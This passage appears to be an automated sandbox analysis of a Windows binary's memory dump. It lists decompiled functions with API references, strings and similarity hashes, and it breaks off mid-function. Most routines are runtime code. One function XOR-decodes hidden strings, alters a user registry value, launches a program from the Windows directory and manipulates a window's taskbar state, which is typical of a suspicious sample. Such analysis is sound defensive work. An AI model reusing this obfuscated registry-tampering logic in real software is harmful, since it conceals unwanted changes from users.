0x00000000
0x00000000
0x00e9d352
0x00e9d357
0x00e9d359
0x00e9d359
0x00e9d35f
0x00000000
0x00000000
0x00e9d364
0x00e9d382
0x00e9d384
0x00e9d3a7
0x00000000
0x00e9d3ac
0x00e9d394
0x00e9d39f
0x00000000
0x00000000
0x00e9d3a1
0x00000000
0x00e9d3a1
0x00e9d366
0x00e9d36e
0x00000000
0x00000000
0x00e9d370
0x00e9d373
0x00e9d379
0x00000000
0x00000000
0x00000000
0x00e9d37b
0x00e9d37d
0x00e9d37f
0x00000000
0x00e9d37f
0x00e9d330
0x00e9d338
0x00000000
0x00000000
0x00e9d33a
0x00e9d33d
0x00e9d343
0x00000000
0x00000000
0x00000000
0x00e9d343
0x00e9d349
0x00e9d34b
0x00000000

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00E9D624,?,00000000), ref: 00E9D397
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00E9D624,?,00000000), ref: 00E9D3C0
GetACP.KERNEL32(?,?,00E9D624,?,00000000), ref: 00E9D3D5

Strings

OCP, xrefs: 00E9D352
ACP, xrefs: 00E9D31C

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 600fce378fb583c8e007b4d8c6a91f7d33a8afb172bc8119e38161c33afcd2de
Instruction ID: 866cac022943df0097c01033a4c245970a5df934743839502a21788cafb86457
Opcode Fuzzy Hash: 600fce378fb583c8e007b4d8c6a91f7d33a8afb172bc8119e38161c33afcd2de
Instruction Fuzzy Hash: BE21C832B0C120AADF30DF65DD01BDB73A6EB95B6AB56A464E909F7100E732DD40C752

Uniqueness

Uniqueness Score: -1.00%

Function 00E9CF81, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00E9CF81(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				signed int _t50;
				int _t56;
				void* _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				void* _t90;
				signed int _t91;
				signed int _t93;
				intOrPtr _t94;
				void* _t96;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				intOrPtr* _t125;
				signed int _t128;
				signed int _t129;
				void* _t130;
				signed int* _t132;
				int _t135;
				signed int _t136;
				void* _t137;
				void* _t150;

				_t50 =  *0xea9014; // 0xa413846
				_v8 = _t50 ^ _t136;
				_t96 = E00E9830D(__ecx, __edx);
				_t132 =  *(E00E9830D(__ecx, __edx) + 0x34c);
				_t135 = E00E9D2AD(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t135, ( ~( *(_t96 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t132 = 0;
					__eflags = 1;
					L38:
					return E00E8AE43(_v8 ^ _t136);
				}
				if(E00E9BE5E(_t96, _t132, _t135,  *((intOrPtr*)(_t96 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t132 & 0x00000300) == 0x300) {
						L36:
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t135, ( ~( *(_t96 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t75 = E00E9BE5E(_t96, _t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248);
					if(_t75 != 0) {
						__eflags =  *(_t96 + 0x60);
						if( *(_t96 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t96 + 0x5c);
						if( *(_t96 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E00E9BE5E(_t96, _t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t132);
						_t79 = E00E9D406(__eflags, _t135, 0);
						__eflags = _t79;
						if(_t79 == 0) {
							goto L36;
						}
						 *_t132 =  *_t132 | 0x00000100;
						__eflags = _t132[1];
						L34:
						if(_t150 == 0) {
							_t132[1] = _t135;
						}
						goto L36;
					}
					_t114 =  *_t132 | 0x00000200;
					 *_t132 = _t114;
					if( *(_t96 + 0x60) == _t75) {
						__eflags =  *(_t96 + 0x5c) - _t75;
						if( *(_t96 + 0x5c) == _t75) {
							goto L20;
						}
						_t125 =  *((intOrPtr*)(_t96 + 0x50));
						_v256 = _t125 + 2;
						do {
							_t81 =  *_t125;
							_t125 = _t125 + 2;
							__eflags = _t81 - _v252;
						} while (_t81 != _v252);
						__eflags = _t125 - _v256 >> 1 -  *(_t96 + 0x5c);
						if(__eflags != 0) {
							_t75 = 0;
							goto L20;
						}
						_push(_t132);
						_t82 = E00E9D406(__eflags, _t135, 1);
						__eflags = _t82;
						if(_t82 == 0) {
							goto L36;
						}
						 *_t132 =  *_t132 | 0x00000100;
						_t75 = 0;
						L21:
						_t150 = _t132[1] - _t75;
						goto L34;
					}
					L20:
					 *_t132 = _t114 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t135, ( ~( *(_t96 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t90 = E00E9BE5E(_t96, _t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248);
				_t118 =  *_t132;
				if(_t90 != 0) {
					__eflags = _t118 & 0x00000002;
					if((_t118 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t96 + 0x5c);
					if( *(_t96 + 0x5c) == 0) {
						L12:
						_t128 =  *_t132;
						__eflags = _t128 & 0x00000001;
						if((_t128 & 0x00000001) != 0) {
							goto L16;
						}
						_t91 = E00E9D3E1(_t135);
						__eflags = _t91;
						if(_t91 == 0) {
							goto L16;
						}
						_t129 = _t128 | 0x00000001;
						__eflags = _t129;
						 *_t132 = _t129;
						goto L15;
					}
					_t93 = E00EA1548(_t96, _t118, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248,  *(_t96 + 0x5c));
					_t137 = _t137 + 0xc;
					__eflags = _t93;
					if(_t93 != 0) {
						goto L12;
					}
					 *_t132 =  *_t132 | 0x00000002;
					__eflags =  *_t132;
					_t132[2] = _t135;
					_t120 =  *((intOrPtr*)(_t96 + 0x50));
					_t130 = _t120 + 2;
					do {
						_t94 =  *_t120;
						_t120 = _t120 + 2;
						__eflags = _t94 - _v252;
					} while (_t94 != _v252);
					__eflags = _t120 - _t130 >> 1 -  *(_t96 + 0x5c);
					if(_t120 - _t130 >> 1 ==  *(_t96 + 0x5c)) {
						_t132[1] = _t135;
					}
				} else {
					_t132[1] = _t135;
					 *_t132 = _t118 | 0x00000304;
					L15:
					_t132[2] = _t135;
				}
			}

0x00e9cf8c
0x00e9cf93
0x00e9cfa1
0x00e9cfa9
0x00e9cfb8
0x00e9cfc4
0x00e9cfd5
0x00e9cfdb
0x00e9cfe4
0x00e9d1be
0x00e9d1c0
0x00e9d1c2
0x00e9d1c3
0x00e9d1d3
0x00e9d1d3
0x00e9cffd
0x00e9d0b8
0x00e9d0c3
0x00e9d1b2
0x00000000
0x00e9d1b9
0x00e9d0d7
0x00e9d0ed
0x00000000
0x00000000
0x00e9d0fd
0x00e9d106
0x00e9d174
0x00e9d177
0x00000000
0x00000000
0x00e9d179
0x00e9d17c
0x00000000
0x00000000
0x00e9d18f
0x00e9d191
0x00000000
0x00000000
0x00e9d193
0x00e9d198
0x00e9d1a0
0x00e9d1a2
0x00000000
0x00000000
0x00e9d1a4
0x00e9d1aa
0x00e9d1ad
0x00e9d1ad
0x00e9d1af
0x00e9d1af
0x00000000
0x00e9d1ad
0x00e9d10a
0x00e9d110
0x00e9d115
0x00e9d127
0x00e9d12a
0x00000000
0x00000000
0x00e9d12c
0x00e9d132
0x00e9d138
0x00e9d138
0x00e9d13b
0x00e9d13e
0x00e9d13e
0x00e9d14f
0x00e9d152
0x00e9d16e
0x00000000
0x00e9d16e
0x00e9d154
0x00e9d158
0x00e9d160
0x00e9d162
0x00000000
0x00000000
0x00e9d164
0x00e9d16a
0x00e9d11f
0x00e9d11f
0x00000000
0x00e9d11f
0x00e9d117
0x00e9d11d
0x00000000
0x00e9d11d
0x00e9d011
0x00e9d027
0x00000000
0x00000000
0x00e9d037
0x00e9d03e
0x00e9d042
0x00e9d051
0x00e9d054
0x00000000
0x00000000
0x00e9d056
0x00e9d05a
0x00e9d09e
0x00e9d09e
0x00e9d0a0
0x00e9d0a3
0x00000000
0x00000000
0x00e9d0a6
0x00e9d0ac
0x00e9d0ae
0x00000000
0x00000000
0x00e9d0b0
0x00e9d0b0
0x00e9d0b3
0x00000000
0x00e9d0b3
0x00e9d069
0x00e9d06e
0x00e9d071
0x00e9d073
0x00000000
0x00000000
0x00e9d075
0x00e9d075
0x00e9d078
0x00e9d07b
0x00e9d07e
0x00e9d081
0x00e9d081
0x00e9d084
0x00e9d087
0x00e9d087
0x00e9d094
0x00e9d097
0x00e9d099
0x00e9d099
0x00e9d044
0x00e9d04a
0x00e9d04d
0x00e9d0b5
0x00e9d0b5
0x00e9d0b5

APIs

Part of subcall function 00E9830D: GetLastError.KERNEL32(00000000,00000001,00000004,00E91A0E,00000001,00000000,00000002,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E98312
Part of subcall function 00E9830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E983B0

Part of subcall function 00E9830D: _free.LIBCMT ref: 00E9836F
Part of subcall function 00E9830D: _free.LIBCMT ref: 00E983A5

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E9CFD5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E9D01F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E9D0E5

Strings

F8A/, xrefs: 00E9CF8C

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast_free
String ID: F8A/
API String ID: 3140898709-73971870
Opcode ID: 839837d6f4c9c763aca24fe25e0067fc95372b78d3623d013ba6fab0550d3d35
Instruction ID: a8cabd7af70f9c8487c7ef8a9a2c9c2e3b9fb80742bdda350b579fcad43fdc8a
Opcode Fuzzy Hash: 839837d6f4c9c763aca24fe25e0067fc95372b78d3623d013ba6fab0550d3d35
Instruction Fuzzy Hash: 9161B0729092279FEF289F25CD82BBA73A9EF04304F105169ED05E7185E738ED85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E9273E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E9273E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xea9014; // 0xa413846
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00E8B61B(_t41);
					_pop(_t62);
				}
				E00E8D0F0(_t67,  &_v804, 0, 0x50);
				E00E8D0F0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00E8B61B(_t57);
				}
				return E00E8AE43(_v8 ^ _t70);
			}

0x00e9273e
0x00e9273e
0x00e9273e
0x00e9273e
0x00e92749
0x00e9274e
0x00e92750
0x00e92758
0x00e9275a
0x00e9275d
0x00e92762
0x00e92762
0x00e9276e
0x00e92781
0x00e9278f
0x00e92795
0x00e9279b
0x00e927a1
0x00e927a7
0x00e927ad
0x00e927b3
0x00e927b9
0x00e927bf
0x00e927c5
0x00e927cc
0x00e927d3
0x00e927da
0x00e927e1
0x00e927e8
0x00e927ef
0x00e927f0
0x00e927f9
0x00e927ff
0x00e92802
0x00e92808
0x00e92815
0x00e9281e
0x00e92827
0x00e92830
0x00e9283e
0x00e92840
0x00e92855
0x00e92861
0x00e92864
0x00e92869
0x00e92878

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E92836
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E92840
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E9284D

Strings

F8A/, xrefs: 00E92749

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: F8A/
API String ID: 3906539128-73971870
Opcode ID: 9ba088c9e04b85987bf4e4c6c817d4a1f2a8777b351298212808733c31f6ced9
Instruction ID: 5585c0388e4930287c368ac361b2b4d5c60e4042d3a5f0c17803fcbc3ab69e49
Opcode Fuzzy Hash: 9ba088c9e04b85987bf4e4c6c817d4a1f2a8777b351298212808733c31f6ced9
Instruction Fuzzy Hash: C331C275901218ABCF21DF65DD88789BBB8BF18310F6051EAE50CA7290EB709F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 00E857CD, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 175
registrystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E857CD(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				signed int _v8;
				signed int _v16;
				char _v276;
				char _v280;
				char _v296;
				char _v297;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char _v356;
				short _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				char _v372;
				struct _AppBarData _v408;
				struct _STARTUPINFOA _v484;
				struct _PROCESS_INFORMATION _v500;
				char _v504;
				int _v508;
				char _v512;
				int _v516;
				char _v520;
				char _v523;
				char _v524;
				void* _v528;
				signed int _t60;
				char* _t62;
				signed char _t75;
				struct HWND__* _t92;
				char* _t102;
				CHAR* _t105;
				int _t116;
				long _t119;
				void* _t120;
				char _t123;
				signed int _t126;
				signed int _t128;

				_t126 =  &_v524;
				_t60 =  *0xea9014; // 0xa413846
				_v8 = _t60 ^ _t126;
				asm("movaps xmm0, [0xe7dc50]");
				_t123 = 2;
				_v504 = _t123;
				asm("movups [esp+0xf4], xmm0");
				_v280 = 0;
				_t62 = E00E82846( &_v296);
				asm("movaps xmm0, [0xe7dbe0]");
				asm("movups [esp+0xb8], xmm0");
				_t102 = _t62;
				_v308 = 0x322e0315;
				asm("movaps xmm0, [0xe7ddb0]");
				_t105 = 0;
				asm("movups [esp+0xc8], xmm0");
				_v304 = 0x19170310;
				asm("movaps xmm0, [0xe7dbb0]");
				asm("movups [esp+0xd8], xmm0");
				_v300 = 0x1e1c1b;
				do {
					_t8 = _t105 + 0x40; // 0x40
					 *(_t126 + _t105 + 0xb8) =  *(_t126 + _t105 + 0xb8) ^ _t8;
					_t105 = _t105 + 1;
				} while (_t105 < 0x3b);
				_v297 = 0;
				RegOpenKeyExA(0x80000001,  &_v356, 0, 0xf003f,  &_v520);
				_t116 = 4;
				_v516 = _t116;
				_v508 = _t116;
				RegQueryValueExA(_v520, _t102, 0,  &_v508,  &_v512,  &_v516);
				if(_v512 != _t123) {
					RegSetValueExA(_v520, _t102, 0, _t116,  &_v504, _v516);
				}
				E00E8D0F0(0,  &_v276, 0, 0x104);
				GetWindowsDirectoryA( &_v276, 0x104);
				_t75 = 0x1c;
				_v523 = 0;
				_v524 = _t75 ^ 0x00000040;
				_v523 = 0;
				lstrcatA( &_v276,  &_v524);
				_v372 = 0x2f323925;
				_v368 = 0x3523372b;
				_v364 = 0x2e322c66;
				_v360 = 0;
				lstrcatA( &_v276, E00E82810( &_v372));
				_t119 = 0x44;
				E00E8D0F0(0,  &_v484, 0, lstrcatA);
				_v484.cb = _t119;
				_v484.lpDesktop = 0xea99c0;
				asm("stosd");
				_t128 = _t126 + 0x18;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( &_v276, 0, 0, 0, 0, 0, 0, 0,  &_v484,  &_v500);
				_v408.cbSize = 0x24;
				_t120 = 0;
				while(1) {
					Sleep(0x3e8);
					_v372 = 0x2f272913;
					_v368 = 0x35121a28;
					_v364 = 0x251d3029;
					_v360 = 0x28;
					_t92 = FindWindowA(E00E827BF( &_v372), 0);
					_v408.hWnd = _t92;
					if(_t92 != 0) {
						break;
					}
					_t120 = _t120 + 1;
					if(_t120 < 5) {
						continue;
					}
					break;
				}
				_v408.lParam = 2;
				SHAppBarMessage(0xa,  &_v408);
				RegSetValueExA(_v528, _t102, 0, 4,  &_v520, _v524);
				RegCloseKey(_v528);
				return E00E8AE43(_v16 ^ _t128);
			}

0x00e857cd
0x00e857d3
0x00e857da
0x00e857e1
0x00e857f5
0x00e857f6
0x00e857fa
0x00e85802
0x00e8580a
0x00e8580f
0x00e85818
0x00e85820
0x00e85822
0x00e8582d
0x00e85834
0x00e85836
0x00e8583e
0x00e85849
0x00e85850
0x00e85858
0x00e85863
0x00e85863
0x00e85866
0x00e8586d
0x00e8586e
0x00e85877
0x00e85892
0x00e8589a
0x00e8589f
0x00e858a8
0x00e858ba
0x00e858ca
0x00e858dc
0x00e858dc
0x00e858ed
0x00e858fe
0x00e8590c
0x00e8590f
0x00e85914
0x00e85924
0x00e8592a
0x00e85933
0x00e8593e
0x00e85949
0x00e85954
0x00e8596a
0x00e8596e
0x00e85977
0x00e8597e
0x00e85986
0x00e8598e
0x00e8598f
0x00e85992
0x00e85993
0x00e85994
0x00e859b0
0x00e859b6
0x00e859c1
0x00e859c3
0x00e859c8
0x00e859d7
0x00e859e2
0x00e859ed
0x00e859f8
0x00e85a08
0x00e85a0e
0x00e85a17
0x00000000
0x00000000
0x00e85a19
0x00e85a1d
0x00000000
0x00000000
0x00000000
0x00e85a1d
0x00e85a26
0x00e85a34
0x00e85a4c
0x00e85a52
0x00e85a70

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00E85892
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00E858BA
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00E858DC
GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00E858FE
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00E8592A
lstrcatA.KERNEL32(?,00000000), ref: 00E8596A
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00E859B0
Sleep.KERNEL32(000003E8), ref: 00E859C8
FindWindowA.USER32 ref: 00E85A08
SHAppBarMessage.SHELL32(0000000A,00000024), ref: 00E85A34
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00E85A4C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E85A52

Strings

(, xrefs: 00E859F8
$, xrefs: 00E859B6
%92/, xrefs: 00E85933
F8A/, xrefs: 00E857D3
f,2., xrefs: 00E85949
Tett, xrefs: 00E85986
+7#5, xrefs: 00E8593E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$lstrcat$CloseCreateDirectoryFindMessageOpenProcessQuerySleepWindowWindows
String ID: $$%92/$($+7#5$F8A/$Tett$f,2.
API String ID: 3986954507-530939844
Opcode ID: 609c29d7f53e492e792332809531f97972bbe9f2579ebaf3740fa2a148201ab5
Instruction ID: c4a42ec5ef2f2f87f878094299ef77c06a1c08a055de5f6aa6559f742e2b27cd
Opcode Fuzzy Hash: 609c29d7f53e492e792332809531f97972bbe9f2579ebaf3740fa2a148201ab5
Instruction Fuzzy Hash: 8C616BB1408384AED320DB15DC45BDBBBE8EF99304F00491EF6CDA6161EB709688CB63

Uniqueness

Uniqueness Score: -1.00%

Function 00E96739, Relevance: 33.2, APIs: 22, Instructions: 188
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E96739(signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v40;
				void* _v44;
				signed int _v60;
				short _v62;
				char _v112;
				long _v152;
				void* __edi;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t99;
				signed int _t107;
				void* _t113;
				signed int _t116;
				signed int _t125;
				void* _t128;
				signed int _t129;
				intOrPtr* _t130;
				intOrPtr _t134;
				signed int _t143;
				signed int _t153;
				long _t154;
				long _t156;
				void* _t158;
				signed int* _t160;
				long _t161;
				signed int* _t165;
				void* _t172;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed char _t184;
				char _t189;
				void* _t190;
				unsigned int _t192;
				signed int _t194;
				signed int* _t195;
				unsigned int _t197;
				void* _t200;
				signed int _t202;

				if(_a8 == 0) {
					L1:
					 *((intOrPtr*)(E00E95BBD())) = 0x16;
					return E00E928EC() | 0xffffffff;
				}
				__eflags = _a12;
				if(_a12 == 0) {
					goto L1;
				}
				__eflags = _a4 - 4;
				if(_a4 > 4) {
					 *(E00E95BAA()) =  *_t152 & 0x00000000;
					goto L1;
				}
				_push(_t153);
				_v16 = 0;
				_v8 = 0;
				_t93 = E00EA1217(_a12, _a16,  &_v16,  &_v8);
				_t154 = _t153 | 0xffffffff;
				__eflags = _t93 - _t154;
				if(_t93 == _t154) {
					E00E964B8(_v8);
					_v8 = 0;
					E00E964B8(_v16);
					L9:
					_t113 = _t154;
					L36:
					return _t113;
				}
				__eflags = _a4 - 4;
				_v12 = 0;
				_t98 = E00E96A8A( &_v12,  &_v20, (_t93 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff);
				__eflags = _t98;
				if(_t98 == 0) {
					E00E964B8(_v12);
					_v12 = 0;
					E00E964B8(_v8);
					_v8 = 0;
					E00E964B8(_v16);
					goto L9;
				}
				__eflags = _a4 - 4;
				if(_a4 == 4) {
					_push(8);
					_pop(0);
				}
				_t99 = E00E95BAA();
				 *_t99 = 0;
				_t189 = 0x44;
				E00E8D0F0(_t189,  &_v112, 0, _t189);
				_v62 = _v20;
				_v60 = _v12;
				_v112 = _t189;
				_t107 = E00EA1292(_t161, __eflags, _a8, _v16, 0, 0, 1, 0, _v8, 0,  &_v112,  &_v44);
				_t200 = _v44;
				_t190 = _v40;
				__eflags = _t107;
				if(_t107 == 0) {
					L21:
					E00E95B87(GetLastError());
					__eflags = _t190 - _t154;
					if(_t190 != _t154) {
						CloseHandle(_t190);
					}
					__eflags = _t200 - _t154;
					if(_t200 != _t154) {
						CloseHandle(_t200);
					}
					L31:
					E00E964B8(_v12);
					_v12 = _v12 & 0x00000000;
					E00E964B8(_v8);
					_v8 = _v8 & 0x00000000;
					E00E964B8(_v16);
					_t113 = _t154;
					L35:
					goto L36;
				}
				_t116 = _a4;
				__eflags = _t116 - 2;
				if(_t116 != 2) {
					__eflags = _t116;
					if(_t116 != 0) {
						__eflags = _t116 - 4;
						if(_t116 != 4) {
							__eflags = _t190 - _t154;
							if(_t190 != _t154) {
								CloseHandle(_t190);
							}
							E00E964B8(_v12);
							_v12 = _v12 & 0x00000000;
							E00E964B8(_v8);
							_t56 =  &_v8;
							 *_t56 = _v8 & 0x00000000;
							__eflags =  *_t56;
							E00E964B8(_v16);
							_t113 = _t200;
							goto L35;
						}
						__eflags = _t190 - _t154;
						if(_t190 != _t154) {
							CloseHandle(_t190);
						}
						__eflags = _t200 - _t154;
						if(_t200 != _t154) {
							CloseHandle(_t200);
						}
						_t154 = 0;
						__eflags = 0;
						goto L31;
					}
					WaitForSingleObject(_t200, _t154);
					_t143 = GetExitCodeProcess(_v44,  &_v24);
					__eflags = _t143;
					if(_t143 == 0) {
						goto L21;
					}
					_v28 = _v24;
					__eflags = _t190 - _t154;
					if(_t190 != _t154) {
						CloseHandle(_t190);
					}
					__eflags = _t200 - _t154;
					if(_t200 != _t154) {
						CloseHandle(_t200);
					}
					_t154 = _v28;
					goto L31;
				}
				E00E92EE0(0);
				asm("int3");
				_push(_t154);
				_t156 = _t161;
				_push(_t200);
				_push(_t190);
				_v152 = _t156;
				 *( *( *_t156)) =  *( *( *_t156)) & 0x00000000;
				 *( *( *(_t156 + 4))) =  *( *( *(_t156 + 4))) & 0x00000000;
				_t202 =  *0xeaa8c8; // 0x40
				__eflags = _t202;
				if(_t202 != 0) {
					_t60 = _t202 - 1; // 0x3f
					_t197 = _t60;
					while(1) {
						_t178 = (_t197 & 0x0000003f) * 0x38;
						_t134 =  *((intOrPtr*)(0xeaa6c8 + (_t197 >> 6) * 4));
						__eflags =  *((char*)(_t134 + _t178 + 0x28));
						if( *((char*)(_t134 + _t178 + 0x28)) == 0) {
							goto L43;
						}
						_t197 = _t197 - 1;
						_t202 = _t202 - 1;
						__eflags = _t202;
						if(_t202 != 0) {
							continue;
						}
						goto L43;
					}
				}
				L43:
				__eflags = _t202 - 0x3332;
				if(_t202 < 0x3332) {
					_v32 = 0x00000004 + _t202 * 0x00000005 & 0x0000ffff;
					_t125 = E00E998AF(0x00000004 + _t202 * 0x00000005 & 0x0000ffff, 1);
					_v24 = _t125;
					__eflags = _t125;
					if(_t125 != 0) {
						_t67 = _t125 + 4; // 0x4
						_t181 = _t67;
						 *_t125 = _t202;
						_t165 = _t181 + _t202;
						_v12 = _t181;
						_t192 = 0;
						_v16 = _t165;
						_v20 = _t165;
						__eflags = _t202;
						if(_t202 != 0) {
							_t129 = _t181;
							_t160 = _t165;
							do {
								_t176 = (_t192 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xeaa6c8 + (_t192 >> 6) * 4));
								_t184 =  *((intOrPtr*)(_t176 + 0x28));
								__eflags = _t184 & 0x00000010;
								if((_t184 & 0x00000010) != 0) {
									 *(_t129 + _t192) = 0;
									_t177 = _t176 | 0xffffffff;
									__eflags = _t177;
								} else {
									 *(_t129 + _t192) = _t184;
									_t177 =  *(_t176 + 0x18);
								}
								 *_t160 = _t177;
								_t192 = _t192 + 1;
								_t160 =  &(_t160[1]);
								__eflags = _t192 - _t202;
							} while (_t192 != _t202);
							_t125 = _v24;
							_t156 = _v28;
							_t181 = _v12;
						}
						__eflags =  *((char*)( *((intOrPtr*)(_t156 + 8))));
						if( *((char*)( *((intOrPtr*)(_t156 + 8)))) == 0) {
							_t172 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t202 - 3;
								if(_t202 >= 3) {
									_t194 = 3;
								} else {
